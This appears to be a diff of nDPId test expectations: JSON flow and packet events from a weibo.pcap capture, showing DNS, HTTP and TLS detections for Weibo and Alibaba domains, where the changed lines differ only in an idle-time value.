00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KDNAAEARjsDAqAFpwKgBAS4WADUAK\/dEyn0BAAABAAAAAAAAB2FjY291bnQFd2VpYm8DY29tAAABAAE="} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1463089073423,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1463089073423,"pkt":"eJKcD6iOkDVu60UQCABFAACwAABAAEARtoLAqAEBwKgBaQA1oYgAnCOtK+iBgAABAAUAAAAAAmpzAXQGc2luYWpzAmNuAAABAAHADAAFAAEAAAA8AAcEd2NkbsARwCwABQABAAAAKQAVBnNpbmFqcwVjc2dsYgV0eGNkbsAYwD8ABQABAAAEEgAUCG40Y3N3aGszBWdjY2RuA25ldADAYAABAAEAAAADAARdvIb2wGAAAQABAAAAAwAEXbyG8Q=="} 00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA4KDhAAEARjsLAqAFpwKgBAUGkADUAJAai81YBAAABAAAAAAAAAWMFd2VpYm8CY24AAAEAAQ=="} 00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1463089073478,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1463089073478,"pkt":"eJKcD6iOkDVu60UQCABFAACdAABAAEARtpXAqAEBwKgBaQA1yPAAiVtu8RCBgAABAAUAAAAAAWcGYWxpY2RuA2NvbQAAAQABwAwABQABAADy0wAXAWcGYWxpY2RuA2NvbQdkYW51b3lpwA7AKgABAAEAAAGzAAQvWUHlwCoAAQABAAABswAEL1lBx8AqAAEAAQAAAbMABC9ZQcbAKgABAAEAAAGzAAQvWUHk"} 00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KD5AAEARjrjAqAFpwKgBAcVlADUAKPnf1EwBAAABAAAAAAAABGRhdGEFd2VpYm8DY29tAAABAAE="} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1463089073488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1463089073488,"pkt":"eJKcD6iOkDVu60UQCABFAABiAABAAEARttDAqAEBwKgBaQA10NoATp++kZuBgAABAAIAAAAAA2xvZwZtbXN0YXQDY29tAAABAAHADAAFAAEAAAIfAAoDbG9nA2dkc8AQwCwAAQABAAAAIwAEjM2uAQ=="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8i2VAAEAGsnbAqAFpjM2uAbzhAbvMrYF4AAAAAKACchDB7gAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8pN1AAEAG2SPAqAFp3kkcYKUoAFA4Ca70AAAAAKACchCCVAAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8GyhAAEAG7ETAqAFpL1lB5caPAbufLBEBAAAAAKACchAfvgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} 